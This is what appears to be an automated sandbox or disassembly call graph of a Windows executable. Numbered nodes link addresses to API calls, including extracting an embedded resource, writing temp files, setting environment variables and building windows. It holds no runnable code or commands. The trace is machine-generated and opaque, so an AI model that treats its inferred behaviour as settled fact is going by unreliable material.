401e97 8747->8749 9571 40de20 GetLastError TlsGetValue SetLastError 8748->9571 9505 40de20 GetLastError TlsGetValue SetLastError 8749->9505 8752 401e9d 9506 4024f1 8752->9506 8753 401ee9 8755 40dfc0 3 API calls 8753->8755 8757 401ef1 8755->8757 8759 40de60 3 API calls 8757->8759 8758 40de60 3 API calls 8760 401eae 8758->8760 8778 401ede 8759->8778 9570 40de20 GetLastError TlsGetValue SetLastError 8760->9570 8763 401eb7 8765 40dfc0 3 API calls 8763->8765 8764 401f05 8766 40dfc0 3 API calls 8764->8766 8767 401ebf 8765->8767 8768 401f0d 8766->8768 8769 40dfc0 3 API calls 8767->8769 9504 405170 TlsGetValue 8768->9504 8771 401eca 8769->8771 8773 40dfc0 3 API calls 8771->8773 8772 401f14 8775 40def0 HeapFree 8772->8775 8774 401ed4 8773->8774 8776 40de60 3 API calls 8774->8776 8777 401f2b 8775->8777 8776->8778 8779 40def0 HeapFree 8777->8779 9503 40de20 GetLastError TlsGetValue SetLastError 8778->9503 8780 401f34 8779->8780 8780->7763 8782 40385b 8781->8782 8782->8782 8783 40df60 21 API calls 8782->8783 8801 40386d 8783->8801 8784 4038ee 9602 40de20 GetLastError TlsGetValue SetLastError 8784->9602 8786 4038f4 9603 40de20 GetLastError TlsGetValue SetLastError 8786->9603 8787 40de20 GetLastError TlsGetValue SetLastError 8787->8801 8789 4038fc 9604 40de20 GetLastError TlsGetValue SetLastError 8789->9604 8790 405d60 2 API calls 8790->8801 8792 403904 9605 40de20 GetLastError TlsGetValue SetLastError 8792->9605 8794 40390c 8795 40d0a0 7 API calls 8794->8795 8796 40391e 8795->8796 9606 405182 TlsGetValue 8796->9606 8797 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8797->8801 8799 403923 8800 405e50 5 API calls 8799->8800 8802 40392b 8800->8802 8801->8784 8801->8787 8801->8790 8801->8797 8803 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8801->8803 8804 40de60 3 API calls 8802->8804 8803->8801 8805 403935 8804->8805 9607 40de20 GetLastError TlsGetValue SetLastError 8805->9607 8807 40393b 9608 40de20 GetLastError TlsGetValue SetLastError 8807->9608 8809 403943 9609 40de20 GetLastError TlsGetValue SetLastError 8809->9609 8811 40394b 9610 40de20 GetLastError TlsGetValue SetLastError 8811->9610 8813 403953 8814 40d0a0 7 API calls 8813->8814 8815 403965 8814->8815 9611 405182 TlsGetValue 8815->9611 8817 40396a 8818 405e50 5 API calls 8817->8818 8819 403972 8818->8819 8820 40de60 3 API calls 8819->8820 8821 40397c 8820->8821 9612 40de20 GetLastError TlsGetValue SetLastError 8821->9612 8823 403982 9613 40de20 GetLastError TlsGetValue SetLastError 8823->9613 8825 40398a 9614 40de20 GetLastError TlsGetValue SetLastError 8825->9614 8827 403992 9615 40de20 GetLastError TlsGetValue SetLastError 8827->9615 8829 40399a 8830 40d0a0 7 API calls 8829->8830 8831 4039aa 8830->8831 9616 405182 TlsGetValue 8831->9616 8833 4039af 8834 405e50 5 API calls 8833->8834 8835 4039b7 8834->8835 8836 40de60 3 API calls 8835->8836 8837 4039c1 8836->8837 9617 40de20 GetLastError TlsGetValue SetLastError 8837->9617 8839 4039c7 9618 40de20 GetLastError TlsGetValue SetLastError 8839->9618 8841 4039cf 9619 40de20 GetLastError TlsGetValue SetLastError 8841->9619 8843 4039d7 9620 40de20 GetLastError TlsGetValue SetLastError 8843->9620 8845 4039df 8846 40d0a0 7 API calls 8845->8846 8847 4039ef 8846->8847 9621 405182 TlsGetValue 8847->9621 8849 4039f4 8850 405e50 5 API calls 8849->8850 8851 4039fc 8850->8851 8852 40de60 3 API calls 8851->8852 8853 403a06 8852->8853 9622 40de20 GetLastError TlsGetValue SetLastError 8853->9622 8855 403a0c 9623 40de20 GetLastError TlsGetValue SetLastError 8855->9623 8857 403a14 9624 40de20 GetLastError TlsGetValue SetLastError 8857->9624 8859 403a1c 9625 40de20 GetLastError TlsGetValue SetLastError 8859->9625 8861 403a24 8862 40d0a0 7 API calls 8861->8862 8863 403a34 8862->8863 9626 405182 TlsGetValue 8863->9626 8865 403a39 8866 405e50 5 API calls 8865->8866 8867 403a41 8866->8867 8868 40de60 3 API calls 8867->8868 8869 403a4b 8868->8869 9627 40de20 GetLastError TlsGetValue SetLastError 8869->9627 8871 403a51 9628 403cd7 8871->9628 8874 4051a0 3 API calls 8875 403a66 8874->8875 9669 40de20 GetLastError TlsGetValue SetLastError 8875->9669 8877 403a6c 8878 403cd7 82 API calls 8877->8878 8879 403a7c 8878->8879 8880 40de60 3 API calls 8879->8880 8881 403a88 8880->8881 9670 40de20 GetLastError TlsGetValue SetLastError 8881->9670 8883 403a8e 8884 403cd7 82 API calls 8883->8884 8885 403a9e 8884->8885 8886 40de60 3 API calls 8885->8886 8887 403aa8 8886->8887 9671 40de20 GetLastError TlsGetValue SetLastError 8887->9671 8889 403aae 8890 403cd7 82 API calls 8889->8890 8891 403abe 8890->8891 8892 40de60 3 API calls 8891->8892 8893 403ac8 8892->8893 9672 40de20 GetLastError TlsGetValue SetLastError 8893->9672 8895 403ace 8896 403cd7 82 API calls 8895->8896 8897 403ade 8896->8897 8898 40de60 3 API calls 8897->8898 8899 403ae8 8898->8899 9673 40de20 GetLastError TlsGetValue SetLastError 8899->9673 8901 403aee 9674 40de20 GetLastError TlsGetValue SetLastError 8901->9674 8903 403af6 9675 40de20 GetLastError TlsGetValue SetLastError 8903->9675 8905 403afe 8906 402bfa 42 API calls 8905->8906 8907 403b0b 8906->8907 9676 40e020 TlsGetValue 8907->9676 8909 403b10 9677 405182 TlsGetValue 8909->9677 8911 403b1f 9678 4065f0 8911->9678 8914 40de60 3 API calls 8915 403b32 8914->8915 9681 40de20 GetLastError TlsGetValue SetLastError 8915->9681 8917 403b38 9682 40de20 GetLastError TlsGetValue SetLastError 8917->9682 8919 403b40 9683 40de20 GetLastError TlsGetValue SetLastError 8919->9683 8921 403b48 8922 402bfa 42 API calls 8921->8922 8923 403b55 8922->8923 9684 40e020 TlsGetValue 8923->9684 8925 403b5a 9685 405182 TlsGetValue 8925->9685 8927 403b69 8928 4065f0 12 API calls 8927->8928 8929 403b72 8928->8929 8930 40de60 3 API calls 8929->8930 8931 403b7c 8930->8931 9686 40de20 GetLastError TlsGetValue SetLastError 8931->9686 8933 403b82 9687 40de20 GetLastError TlsGetValue SetLastError 8933->9687 8935 403b8e 8936 40dfc0 3 API calls 8935->8936 8937 403b96 8936->8937 8938 40dfc0 3 API calls 8937->8938 8939 403ba1 8938->8939 8940 40dfc0 3 API calls 8939->8940 8941 403bab 8940->8941 8942 40dfc0 3 API calls 8941->8942 8943 403bb5 8942->8943 8944 40dfc0 3 API calls 8943->8944 8945 403bbf 8944->8945 9688 40e020 TlsGetValue 8945->9688 8947 403bc4 9689 405182 TlsGetValue 8947->9689 8949 403bcf 9690 40240c 8949->9690 8952 4051a0 3 API calls 8953 403bdd 8952->8953 8954 40def0 HeapFree 8953->8954 8955 403be8 8954->8955 8956 40def0 HeapFree 8955->8956 8957 403bf1 8956->8957 8958 40def0 HeapFree 8957->8958 8959 403bfa 8958->8959 8960 40def0 HeapFree 8959->8960 8961 403c03 8960->8961 8962 40def0 HeapFree 8961->8962 8963 403c0c 8962->8963 8964 40def0 HeapFree 8963->8964 8965 403c15 8964->8965 8966 40def0 HeapFree 8965->8966 8967 403c1e 8966->8967 8968 40def0 HeapFree 8967->8968 8969 403c27 8968->8969 8970 40def0 HeapFree 8969->8970 8971 403c30 8970->8971 8972 40def0 HeapFree 8971->8972 8973 403c39 8972->8973 8974 40de20 GetLastError TlsGetValue SetLastError 8973->8974 8974->7768 8975->7774 8976->7790 8977->7792 9029 4054b7 RtlEnterCriticalSection 9028->9029 9030 404502 9028->9030 9035 4054cd 9029->9035 9036 4054fd 9029->9036 9030->7788 9031 40db12 RtlAllocateHeap 9033 405517 RtlLeaveCriticalSection 9031->9033 9032 4054ce WaitForSingleObject 9034 4054de CloseHandle 9032->9034 9032->9035 9033->9030 9034->9035 9035->9032 9035->9036 9036->9031 9038 40df60 21 API calls 9037->9038 9039 402cb7 9038->9039 9040 405060 2 API calls 9039->9040 9041 402cc3 9040->9041 9042 402cf0 9041->9042 9960 40de20 GetLastError TlsGetValue SetLastError 9041->9960 9962 40de20 GetLastError TlsGetValue SetLastError 9042->9962 9045 402cf6 9963 40de20 GetLastError TlsGetValue SetLastError 9045->9963 9046 402cd2 9961 40de20 GetLastError TlsGetValue SetLastError 9046->9961 9049 402cfe 9964 40de20 GetLastError TlsGetValue SetLastError 9049->9964 9050 402cda 9052 409b60 3 API calls 9050->9052 9054 402ce6 9052->9054 9053 402d06 9056 40de60 3 API calls 9054->9056 9056->9042 9152 40e080 9102->9152 9104 4032a2 9104->8249 9106 402bc7 9105->9106 9106->9106 9107 40df60 21 API calls 9106->9107 9108 402bd9 GetNativeSystemInfo 9107->9108 9109 402bec 9108->9109 9109->8253 9109->8254 9110->8279 9111->8286 9113 4055c8 9112->9113 9117 4032bd 9112->9117 9113->9117 9155 405553 memset GetModuleHandleW 9113->9155 9116 405606 GetVersionExW 9116->9117 9117->8254 9118->8262 9119->8266 9121 40e200 2 API calls 9120->9121 9122 4032ef 9121->9122 9122->8271 9123->8276 9124->8291 9125->8307 9158 40d438 RtlEnterCriticalSection 9126->9158 9128 40ad75 9129 40ae0e 9128->9129 9130 40ad7f CreateFileW 9128->9130 9129->8318 9131 40ada0 9130->9131 9132 40adc0 9130->9132 9131->9132 9133 40adad RtlAllocateHeap 9131->9133 9135 40ae05 9132->9135 9167 40d3aa RtlEnterCriticalSection 9132->9167 9133->9132 9135->8318 9137 40a989 9136->9137 9138 40a97a 9136->9138 9172 40d3f9 RtlEnterCriticalSection 9137->9172 9176 40d995 9138->9176 9142 40a9cd 9142->8319 9144 40a9b9 FindCloseChangeNotification 9146 40d3aa 3 API calls 9144->9146 9146->9142 9147 40a9a8 HeapFree 9147->9144 9148->8327 9149->8329 9150->8261 9151->8265 9153 40e0c7 9152->9153 9154 40e08a wcslen RtlAllocateHeap 9152->9154 9153->9104 9154->9153 9156 40558b 9155->9156 9157 40557b GetProcAddress 9155->9157 9156->9116 9156->9117 9157->9156 9159 40d452 9158->9159 9160 40d467 9158->9160 9161 40db12 RtlAllocateHeap 9159->9161 9162 40d48c 9160->9162 9163 40d46c RtlReAllocateHeap 9160->9163 9165 40d461 RtlLeaveCriticalSection 9161->9165 9164 40d4a1 RtlAllocateHeap 9162->9164 9162->9165 9163->9162 9164->9165 9165->9128 9168 40d3e1 9167->9168 9169 40d3c2 9167->9169 9171 40d3ed RtlLeaveCriticalSection 9168->9171 9169->9168 9170 40d3d0 memset 9169->9170 9169->9171 9170->9171 9171->9135 9173 40d412 9172->9173 9174 40d41d RtlLeaveCriticalSection 9172->9174 9173->9174 9175 40a996 9174->9175 9175->9142 9175->9144 9182 40a9e0 9175->9182 9177 40d9a2 9176->9177 9178 40a985 9176->9178 9185 40dabb RtlEnterCriticalSection 9177->9185 9178->8319 9181 40d9a8 9181->9178 9186 40da64 9181->9186 9183 40a9f4 WriteFile 9182->9183 9184 40aa1c 9182->9184 9183->9147 9184->9147 9185->9181 9188 40da70 9186->9188 9187 40dab4 9187->9181 9188->9187 9189 40daaa RtlLeaveCriticalSection 9188->9189 9189->9187 9191 409b48 RtlAllocateHeap 9190->9191 9192 409b5a 9190->9192 9191->8353 9192->8353 9194 40e767 9193->9194 9196 40e77b 9194->9196 9208 40e800 9194->9208 9196->8357 9198 40df60 21 API calls 9197->9198 9199 4026c1 LoadResource SizeofResource 9198->9199 9200 409b40 RtlAllocateHeap 9199->9200 9201 4026ee 9200->9201 9223 409c20 memcpy 9201->9223 9203 402705 FreeResource 9204 402715 9203->9204 9205 4046ef 9204->9205 9224 409b00 9205->9224 9207 4046f8 9207->8356 9209 40f1b5 9208->9209 9212 40e810 9208->9212 9209->9196 9210 40ed61 9214 40edc9 9210->9214 9215 4101e0 9210->9215 9212->9209 9212->9210 9213 40ec88 memcpy 9212->9213 9213->9212 9214->9196 9216 4101f4 9215->9216 9217 410262 memcpy 9216->9217 9218 41023c memcpy 9216->9218 9220 41020f 9216->9220 9221 410289 memcpy 9217->9221 9222 4102a8 9217->9222 9218->9214 9220->9214 9221->9214 9222->9214 9223->9203 9225 409b08 RtlSizeHeap 9224->9225 9226 409b1a 9224->9226 9225->9207 9226->9207 9227->8371 9228->8379 9229->8370 9230->8374 9231->8378 9232->8381 9234 409bc9 9233->9234 9235 409bb9 9233->9235 9237 40e200 2 API calls 9234->9237 9336 409b60 9235->9336 9239 409bdf 9237->9239 9342 40e350 TlsGetValue 9239->9342 9241 409c08 9241->8386 9242->8390 9343 405f30 9243->9343 9245 402211 9245->8395 9246->8399 9247->8401 9248->8403 9249->8405 9250->8409 9251->8415 9252->8417 9253->8419 9254->8421 9256 40590f 9255->9256 9260 405801 9255->9260 9353 40e2a0 TlsGetValue 9256->9353 9258 405918 9258->8423 9259 405886 9262 40e180 TlsGetValue 9259->9262 9260->9259 9261 405850 _wcsncoll 9260->9261 9261->9260 9263 4058c7 9262->9263 9264 4058e9 9263->9264 9352 40e1d0 TlsGetValue 9263->9352 9266 40e200 2 API calls 9264->9266 9268 4058f0 9266->9268 9267 4058d7 memmove 9267->9264 9269 405901 9268->9269 9270 4058f6 wcsncpy 9268->9270 9269->8423 9270->9269 9271->8425 9272->8427 9273->8429 9274->8433 9275->8435 9354 408df8 9276->9354 9278 408f21 9279 408df8 3 API calls 9278->9279 9280 408f30 9279->9280 9281 408df8 3 API calls 9280->9281 9282 408f43 9281->9282 9283 408f50 GetStockObject 9282->9283 9284 408f5d LoadIconW LoadCursorW RegisterClassExW 9282->9284 9283->9284 9358 409471 GetForegroundWindow 9284->9358 9289 408fe7 IsWindowEnabled 9290 40900b 9289->9290 9291 408ff2 EnableWindow 9289->9291 9292 409471 3 API calls 9290->9292 9291->9290 9293 40901e GetSystemMetrics GetSystemMetrics CreateWindowExW 9292->9293 9294 40925a 9293->9294 9295 40906b CreateWindowExW SendMessageW 9293->9295 9296 40926d 9294->9296 9371 40e2a0 TlsGetValue 9294->9371 9301 4090c5 9295->9301 9302 4090c8 CreateWindowExW SendMessageW SetFocus 9295->9302 9372 408e3a 9296->9372 9301->9302 9304 409145 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9302->9304 9305 40911b SendMessageW wcslen wcslen SendMessageW 9302->9305 9303 408e3a HeapFree 9307 40927f 9303->9307 9306 40920a 9304->9306 9305->9304 9309 409213 9306->9309 9310 4091ce GetMessageW 9306->9310 9308 408e3a HeapFree 9307->9308 9312 4022e5 9308->9312 9313 409217 DestroyAcceleratorTable 9309->9313 9314 40921e 9309->9314 9310->9309 9311 4091e3 TranslateAcceleratorW 9310->9311 9311->9306 9315 4091f4 TranslateMessage DispatchMessageW 9311->9315 9312->8438 9313->9314 9314->9294 9316 409225 wcslen 9314->9316 9315->9306 9317 40e200 2 API calls 9316->9317 9318 40923c wcscpy HeapFree 9317->9318 9318->9294 9319->8444 9320->8446 9321->8448 9322->8450 9323->8454 9324->8461 9325->8463 9326->8465 9327->8469 9328->8471 9330 409471 3 API calls 9329->9330 9331 408dcd 9330->9331 9332 409528 14 API calls 9331->9332 9333 408dd6 MessageBoxW 9332->9333 9334 409528 14 API calls 9333->9334 9335 40239f 9334->9335 9335->8474 9337 409b6d 9336->9337 9338 40e200 2 API calls 9337->9338 9339 409b8b 9338->9339 9340 409b91 memcpy 9339->9340 9341 409b9f 9339->9341 9340->9341 9341->8386 9342->9241 9346 405f41 9343->9346 9344 40e180 TlsGetValue 9345 405fb4 9344->9345 9347 40e200 2 API calls 9345->9347 9346->9344 9346->9346 9348 405fc2 9347->9348 9350 405fd2 9348->9350 9351 40e2d0 TlsGetValue 9348->9351 9350->9245 9351->9350 9352->9267 9353->9258 9355 408e00 wcslen RtlAllocateHeap 9354->9355 9356 408e36 9354->9356 9355->9356 9357 408e26 wcscpy 9355->9357 9356->9278 9357->9278 9359 408fd2 9358->9359 9360 409482 GetWindowThreadProcessId GetCurrentProcessId 9358->9360 9361 409528 9359->9361 9360->9359 9362 409532 EnumWindows 9361->9362 9370 40957d 9361->9370 9363 408fde 9362->9363 9364 40954f 9362->9364 9375 4094a7 GetWindowThreadProcessId GetCurrentThreadId 9362->9375 9363->9289 9363->9290 9364->9363 9365 409551 GetCurrentThreadId 9364->9365 9367 409564 SetWindowPos 9364->9367 9365->9364 9366 40958a GetCurrentThreadId 9366->9370 9367->9364 9368 4095a0 EnableWindow 9368->9370 9369 4095b1 SetWindowPos 9369->9370 9370->9363 9370->9366 9370->9368 9370->9369 9371->9296 9373 408e41 HeapFree 9372->9373 9374 408e53 9372->9374 9373->9374 9374->9303 9376 4094c5 IsWindowVisible 9375->9376 9377 40951f 9375->9377 9376->9377 9378 4094d0 9376->9378 9379 40db12 RtlAllocateHeap 9378->9379 9380 4094dc GetCurrentThreadId 9379->9380 9381 4094f6 GetForegroundWindow 9380->9381 9381->9377 9383 409508 IsWindowEnabled 9381->9383 9383->9377 9384 409513 EnableWindow 9383->9384 9384->9377 9385->8484 9386->8487 9388 40e200 2 API calls 9387->9388 9389 40a709 GetTempPathW LoadLibraryW 9388->9389 9390 40a744 9389->9390 9391 40a726 GetProcAddress 9389->9391 9413 40e350 TlsGetValue 9390->9413 9392 40a736 GetLongPathNameW 9391->9392 9393 40a73d FreeLibrary 9391->9393 9392->9393 9393->9390 9395 401a0d 9395->8490 9396->8493 9397->8496 9414 40a759 9398->9414 9401 40a665 9402 40a674 wcsncpy wcslen 9401->9402 9403 401a6a GetTempFileNameW 9401->9403 9405 40a6a8 CreateDirectoryW 9402->9405 9406 40de20 GetLastError TlsGetValue SetLastError 9403->9406 9405->9403 9406->8508 9407->8510 9408->8520 9409->8522 9410->8530 9411->8532 9412->8538 9413->9395 9415 40a760 9414->9415 9416 401a5f 9414->9416 9417 40a776 DeleteFileW 9415->9417 9418 40a767 SetFileAttributesW 9415->9418 9416->9401 9417->9416 9418->9417 9419->8550 9421 40a901 SetCurrentDirectoryW 9420->9421 9422 4046cb 9420->9422 9421->9422 9422->8559 9423->8638 9424->8672 9425->8580 9426->8591 9427->8586 9428->8592 9429->8606 9431 40e200 2 API calls 9430->9431 9432 40a7ef 9431->9432 9433 40a7fe LoadLibraryW 9432->9433 9444 40a889 9432->9444 9435 40a86b 9433->9435 9436 40a80f GetProcAddress 9433->9436 9434 40a8bb 9494 40e350 TlsGetValue 9434->9494 9490 40a90c SHGetFolderLocation 9435->9490 9439 40a860 FreeLibrary 9436->9439 9440 40a824 9436->9440 9439->9434 9439->9435 9440->9439 9445 40a836 wcscpy wcscat wcslen 9440->9445 9441 40a90c 3 API calls 9441->9434 9442 40362c 9442->8635 9444->9434 9444->9441 9445->9439 9446->8595 9447->8610 9448->8607 9449->8626 9450->8612 9451->8631 9452->8619 9453->8639 9454->8632 9455->8654 9456->8640 9457->8658 9458->8655 9459->8664 9460->8659 9461->8674 9463 409308 CoInitialize 9462->9463 9464 409319 memset LoadLibraryW 9462->9464 9463->9464 9465 409343 GetProcAddress GetProcAddress 9464->9465 9466 40944b 9464->9466 9467 409372 wcsncpy wcslen 9465->9467 9468 40936d 9465->9468 9469 40e200 2 API calls 9466->9469 9470 4093a1 9467->9470 9468->9467 9471 409458 9469->9471 9472 409471 3 API calls 9470->9472 9495 40e350 TlsGetValue 9471->9495 9473 4093bf 9472->9473 9475 409528 14 API calls 9473->9475 9477 4093e2 9475->9477 9476 4037c6 9476->8686 9478 409528 14 API calls 9477->9478 9479 4093f7 9478->9479 9480 40943f FreeLibrary 9479->9480 9481 40e200 2 API calls 9479->9481 9480->9466 9480->9471 9482 409408 wcslen 9481->9482 9482->9480 9484 409433 9482->9484 9484->9480 9486 40553b timeBeginPeriod 9485->9486 9487 40554d Sleep 9485->9487 9486->9487 9488->8660 9489->8675 9491 40a92b SHGetPathFromIDListW 9490->9491 9492 40a873 wcscat wcslen 9490->9492 9491->9492 9493 40a939 wcslen 9491->9493 9492->9434 9493->9492 9494->9442 9495->9476 9496->8708 9497->8710 9498->8716 9499->8718 9500->8722 9501->8741 9502->8743 9503->8764 9504->8772 9505->8752 9507 4024f7 9506->9507 9507->9507 9508 40df60 21 API calls 9507->9508 9509 402509 9508->9509 9510 4051a0 3 API calls 9509->9510 9531 402512 9510->9531 9511 402593 9572 40de20 GetLastError TlsGetValue SetLastError 9511->9572 9512 40de20 GetLastError TlsGetValue SetLastError 9512->9531 9514 402599 9573 40de20 GetLastError TlsGetValue SetLastError 9514->9573 9516 4025a1 GetCommandLineW 9518 409b60 3 API calls 9516->9518 9517 405d60 2 API calls 9517->9531 9519 4025ae 9518->9519 9520 40de60 3 API calls 9519->9520 9521 4025b8 9520->9521 9574 40de20 GetLastError TlsGetValue SetLastError 9521->9574 9523 4025c2 9524 40dfc0 3 API calls 9523->9524 9525 4025ca 9524->9525 9527 40de60 3 API calls 9525->9527 9526 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 9526->9531 9528 4025d4 PathRemoveArgsW 9527->9528 9530 4025eb 9528->9530 9529 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9529->9531 9532 402651 9530->9532 9575 40de20 GetLastError TlsGetValue SetLastError 9530->9575 9531->9511 9531->9512 9531->9517 9531->9526 9531->9529 9533 409860 SetEnvironmentVariableW 9532->9533 9535 40265e 9533->9535 9588 40de20 GetLastError TlsGetValue SetLastError 9535->9588 9536 4025fd 9538 40dfc0 3 API calls 9536->9538 9540 40260a 9538->9540 9539 402668 9542 40dfc0 3 API calls 9539->9542 9576 40de20 GetLastError TlsGetValue SetLastError 9540->9576 9544 402670 9542->9544 9543 402610 9577 40de20 GetLastError TlsGetValue SetLastError 9543->9577 9589 405170 TlsGetValue 9544->9589 9547 402618 9578 40de20 GetLastError TlsGetValue SetLastError 9547->9578 9548 402677 9551 40def0 HeapFree 9548->9551 9550 402620 9579 40de20 GetLastError TlsGetValue SetLastError 9550->9579 9553 40268f 9551->9553 9555 40def0 HeapFree 9553->9555 9554 402628 9580 4060b0 9554->9580 9557 402698 9555->9557 9559 40def0 HeapFree 9557->9559 9558 402639 9587 405182 TlsGetValue 9558->9587 9561 4026a1 9559->9561 9563 40def0 HeapFree 9561->9563 9562 40263e 9565 406000 4 API calls 9562->9565 9564 4026aa 9563->9564 9566 40def0 HeapFree 9564->9566 9567 402646 9565->9567 9568 401ea4 9566->9568 9569 40de60 3 API calls 9567->9569 9568->8758 9569->9532 9570->8763 9571->8753 9572->9514 9573->9516 9574->9523 9575->9536 9576->9543 9577->9547 9578->9550 9579->9554 9581 4060e6 9580->9581 9582 4060b8 9580->9582 9599 40e2a0 TlsGetValue 9581->9599 9590 406020 9582->9590 9584 4060ef 9584->9558 9587->9562 9588->9539 9589->9548 9591 40e180 TlsGetValue 9590->9591 9592 40603c 9591->9592 9593 40e200 2 API calls 9592->9593 9594 406048 9593->9594 9598 406054 9594->9598 9600 40e2d0 TlsGetValue 9594->9600 9597 40609d 9597->9558 9601 40e350 TlsGetValue 9598->9601 9599->9584 9600->9598 9601->9597 9602->8786 9603->8789 9604->8792 9605->8794 9606->8799 9607->8807 9608->8809 9609->8811 9610->8813 9611->8817 9612->8823 9613->8825 9614->8827 9615->8829 9616->8833 9617->8839 9618->8841 9619->8843 9620->8845 9621->8849 9622->8855 9623->8857 9624->8859 9625->8861 9626->8865 9627->8871 9629 40df60 21 API calls 9628->9629 9630 403ce3 9629->9630 9631 4051a0 3 API calls 9630->9631 9632 403cec 9631->9632 9633 405060 2 API calls 9632->9633 9634 403cf8 FindResourceW 9633->9634 9635 403db3 9634->9635 9636 403d1b 9634->9636 9758 40de20 GetLastError TlsGetValue SetLastError 9635->9758 9637 4026b8 26 API calls 9636->9637 9639 403d2a 9637->9639 9641 4046ef RtlSizeHeap 9639->9641 9640 403dbd 9642 40dfc0 3 API calls 9640->9642 9643 403d37 9641->9643 9644 403dc5 9642->9644 9705 4011de 9643->9705 9759 405170 TlsGetValue 9644->9759 9648 403d5a 9729 4046ff 9648->9729 9649 403d7c 9745 40de20 GetLastError TlsGetValue SetLastError 9649->9745 9650 40def0 HeapFree 9653 403de3 9650->9653 9656 40def0 HeapFree 9653->9656 9655 403d82 9746 40de20 GetLastError TlsGetValue SetLastError 9655->9746 9659 403a61 9656->9659 9659->8874 9660 403d7a 9760 40e050 TlsGetValue 9660->9760 9661 403d8a 9747 409c50 9661->9747 9663 403da0 9665 40de60 3 API calls 9663->9665 9667 403daa 9665->9667 9666 403dcc 9666->9650 9757 409b20 HeapFree 9667->9757 9669->8877 9670->8883 9671->8889 9672->8895 9673->8901 9674->8903 9675->8905 9676->8909 9677->8911 9837 4062b0 9678->9837 9681->8917 9682->8919 9683->8921 9684->8925 9685->8927 9686->8933 9687->8935 9688->8947 9689->8949 9691 405060 2 API calls 9690->9691 9692 40241f 9691->9692 9693 405060 2 API calls 9692->9693 9694 40242c 9693->9694 9866 40ac50 9694->9866 9698 402457 9699 40a970 10 API calls 9698->9699 9700 402464 9699->9700 9701 40def0 HeapFree 9700->9701 9702 40248b 9701->9702 9703 40def0 HeapFree 9702->9703 9704 402494 9703->9704 9704->8952 9706 4011e6 9705->9706 9706->9706 9707 405060 2 API calls 9706->9707 9708 4011ff 9707->9708 9761 405700 9708->9761 9711 409b00 RtlSizeHeap 9712 401214 9711->9712 9713 40db6a 4 API calls 9712->9713 9714 401236 9713->9714 9715 40db6a 4 API calls 9714->9715 9716 401254 9715->9716 9717 40db6a 4 API calls 9716->9717 9718 4014ac 9717->9718 9719 40db6a 4 API calls 9718->9719 9720 4014ca 9719->9720 9768 409b20 HeapFree 9720->9768 9722 4014d3 9723 40def0 HeapFree 9722->9723 9724 4014e3 9723->9724 9725 40dcbd 2 API calls 9724->9725 9726 4014ed 9725->9726 9727 40dcbd 2 API calls 9726->9727 9728 4014f6 9727->9728 9728->9648 9728->9649 9730 40df60 21 API calls 9729->9730 9731 40470d 9730->9731 9732 405060 2 API calls 9731->9732 9733 404719 9732->9733 9734 40472c 9733->9734 9769 40249b 9733->9769 9743 40473d 9734->9743 9778 40ac70 9734->9778 9737 40def0 HeapFree 9738 403d71 9737->9738 9744 409b20 HeapFree 9738->9744 9739 40474f 9740 40478f 9739->9740 9739->9743 9789 40af50 9739->9789 9742 40a970 10 API calls 9740->9742 9742->9743 9743->9737 9744->9660 9745->9655 9746->9661 9748 409c70 9747->9748 9752 409cc8 9747->9752 9749 40e200 2 API calls 9748->9749 9750 409c99 9749->9750 9836 40e350 TlsGetValue 9750->9836 9751 409d23 MultiByteToWideChar 9754 40e200 2 API calls 9751->9754 9752->9751 9756 409d40 MultiByteToWideChar 9754->9756 9755 409cbd 9755->9663 9756->9663 9757->9635 9758->9640 9759->9666 9760->9666 9762 405710 WideCharToMultiByte 9761->9762 9763 40570b 9761->9763 9764 409b40 RtlAllocateHeap 9762->9764 9763->9762 9765 405730 9764->9765 9766 405736 WideCharToMultiByte 9765->9766 9767 401207 9765->9767 9766->9767 9767->9711 9768->9722 9770 405060 2 API calls 9769->9770 9771 4024ac 9770->9771 9800 40ad40 9771->9800 9774 4024d3 9776 40def0 HeapFree 9774->9776 9775 40a970 10 API calls 9775->9774 9777 4024eb 9776->9777 9777->9734 9779 40d438 5 API calls 9778->9779 9780 40ac85 9779->9780 9781 40ad37 9780->9781 9782 40ac8f CreateFileW 9780->9782 9781->9739 9783 40acb0 CreateFileW 9782->9783 9784 40accc 9782->9784 9783->9784 9786 40aced 9783->9786 9785 40acd9 RtlAllocateHeap 9784->9785 9784->9786 9785->9786 9787 40d3aa 3 API calls 9786->9787 9788 40ad2e 9786->9788 9787->9788 9788->9739 9790 40af62 9789->9790 9791 40afb5 9789->9791 9792 40afad 9790->9792 9793 40d3f9 2 API calls 9790->9793 9791->9740 9792->9740 9794 40af7a 9793->9794 9795 40afa3 9794->9795 9796 40af92 WriteFile 9794->9796 9797 40af84 9794->9797 9795->9740 9796->9795 9825 40afc0 9797->9825 9799 40af8c 9799->9740 9803 40aa60 9800->9803 9802 4024bf 9802->9774 9802->9775 9804 40aa78 9803->9804 9805 40d438 5 API calls 9804->9805 9806 40aa8f 9805->9806 9807 40ac42 9806->9807 9808 40aade 9806->9808 9809 40aaa2 9806->9809 9807->9802 9810 40aae3 9808->9810 9815 40ab1c 9808->9815 9811 40aab9 9809->9811 9812 40aabc CreateFileW 9809->9812 9813 40aafa 9810->9813 9814 40aafd CreateFileW 9810->9814 9811->9812 9818 40ab88 9812->9818 9813->9814 9814->9818 9816 40ab47 CreateFileW 9815->9816 9815->9818 9817 40ab69 CreateFileW 9816->9817 9816->9818 9817->9818 9819 40abc2 9818->9819 9821 40abae RtlAllocateHeap 9818->9821 9822 40ac10 9818->9822 9819->9822 9823 40abfc SetFilePointer 9819->9823 9820 40d3aa 3 API calls 9820->9807 9821->9819 9822->9820 9824 40ac21 9822->9824 9823->9822 9824->9802 9826 40b0c7 9825->9826 9827 40afda 9825->9827 9826->9799 9828 40afe0 SetFilePointer 9827->9828 9829 40b00b 9827->9829 9828->9829 9830 40b017 9829->9830 9831 40a9e0 WriteFile 9829->9831 9832 40b047 9830->9832 9835 40b031 memcpy 9830->9835 9833 40b08e 9831->9833 9832->9799 9833->9830 9834 40b095 WriteFile 9833->9834 9834->9799 9835->9799 9836->9755 9838 4062bf 9837->9838 9839 4063d8 9838->9839 9849 40634e 9838->9849 9840 40e180 TlsGetValue 9839->9840 9841 4063e2 9840->9841 9842 4063fa 9841->9842 9843 4063ea _wcsdup 9841->9843 9844 40e180 TlsGetValue 9842->9844 9843->9842 9845 406400 9844->9845 9846 406417 9845->9846 